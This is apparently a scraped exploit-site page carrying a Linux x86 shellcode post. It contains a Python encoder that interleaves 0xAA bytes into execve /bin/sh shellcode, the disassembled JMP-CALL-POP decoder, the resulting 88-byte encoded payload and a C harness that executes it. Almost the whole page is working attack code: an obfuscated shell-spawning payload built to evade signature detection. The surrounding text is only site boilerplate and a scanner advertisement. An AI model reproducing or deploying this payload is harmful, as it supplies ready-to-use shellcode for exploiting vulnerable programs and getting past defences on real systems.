Registerlinuxx86 insertion encoder decoder execve(binsh) shellcode (88 bytes)
▸▸▸ Exploit & Vulnerability >> shellcode exploit & linux_x86 vulnerability
Online Vulnerability Scanner Tools
Code...
/* ''' ; Date: 07/03/2019 ; Insertion-Encoder.asm ; Author: Daniele Votta ; Description: This program encode shellcode with insertion technique (0xAA). ; Tested on: i686 GNU/Linux ''' #!/usr/bin/python # Python Insertion Encoder import random # Execve /bin/sh (25 bytes) shellcode =("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80") encoded = "" encoded2 = "" print 'Encoded shellcode...' for x in bytearray(shellcode): # Insertion Encoding encoded += '\\x' encoded += '%02x' % x encoded += '\\x%02x' % 0xAA # encoded += '\\x%02x' % random.randint(1,255) encoded2 += '0x' encoded2 += '%02x,' % x encoded2 += '0x%02x,' % 0xAA # encoded2 += '0x%02x' % random.randint(1,255) print encoded +"\n" print encoded2 print 'Len: %d' % len(bytearray(shellcode)) */ #include<stdio.h> #include<string.h> /* ; Insertion-Decoder.asm ; Author: Daniele Votta ; Description: This program decode shellcode with insertion technique (0xAA). ; Tested on: i686 GNU/Linux ; Shellcode Length:50 ; JMP | CALL | POP | Techniques Insertion-Decoder: file format elf32-i386 Disassembly of section .text: 08048080 <_start>: 8048080: eb 1d jmp 804809f <call_decoder> 08048082 <decoder>: 8048082: 5e pop esi 8048083: 8d 7e 01 lea edi,[esi+0x1] 8048086: 31 c0 xor eax,eax 8048088: b0 01 mov al,0x1 804808a: 31 db xor ebx,ebx 0804808c <decode>: 804808c: 8a 1c 06 mov bl,BYTE PTR [esi+eax*1] 804808f: 80 f3 aa xor bl,0xaa 8048092: 75 10 jne 80480a4 <EncodedShellcode> 8048094: 8a 5c 06 01 mov bl,BYTE PTR [esi+eax*1+0x1] 8048098: 88 1f mov BYTE PTR [edi],bl 804809a: 47 inc edi 804809b: 04 02 add al,0x2 804809d: eb ed jmp 804808c <decode> 0804809f <call_decoder>: 804809f: e8 de ff ff ff call 8048082 <decoder> 080480a4 <EncodedShellcode>: 80480a4: 31 aa c0 aa 50 aa xor DWORD PTR [edx-0x55af5540],ebp 80480aa: 68 aa 2f aa 2f push 0x2faa2faa 80480af: aa stos BYTE PTR es:[edi],al 80480b0: 73 aa jae 804805c <_start-0x24> 80480b2: 68 aa 68 aa 2f push 0x2faa68aa 80480b7: aa stos BYTE PTR es:[edi],al 80480b8: 62 aa 69 aa 6e aa bound ebp,QWORD PTR [edx-0x55915597] 80480be: 89 aa e3 aa 50 aa mov DWORD PTR [edx-0x55af551d],ebp 80480c4: 89 aa e2 aa 53 aa mov DWORD PTR [edx-0x55ac551e],ebp 80480ca: 89 aa e1 aa b0 aa mov DWORD PTR [edx-0x554f551f],ebp 80480d0: 0b aa cd aa 80 aa or ebp,DWORD PTR [edx-0x557f5533] 80480d6: bb .byte 0xbb 80480d7: bb .byte 0xbb [+] Extract Shellcode ... "\xeb\x1d\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x8a\x1c\x06\x80\xf3\xaa\x75\x10\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xe8\xde\xff\xff\xff\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa\xbb\xbb" ======================= POC Daniele Votta ======================= */ /* Insertion Encoded Execve /bin/sh (88 bytes) */ unsigned char code[] = \ "\xeb\x1d\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x8a\x1c\x06\x80\xf3\xaa\x75\x10\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xe8\xde\xff\xff\xff\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa\xbb\xbb"; int main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); }
Linuxx86 insertion encoder decoder execve(binsh) shellcode (88 bytes) Vulnerability / Exploit Source : Linuxx86 insertion encoder decoder execve(binsh) shellcode (88 bytes)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes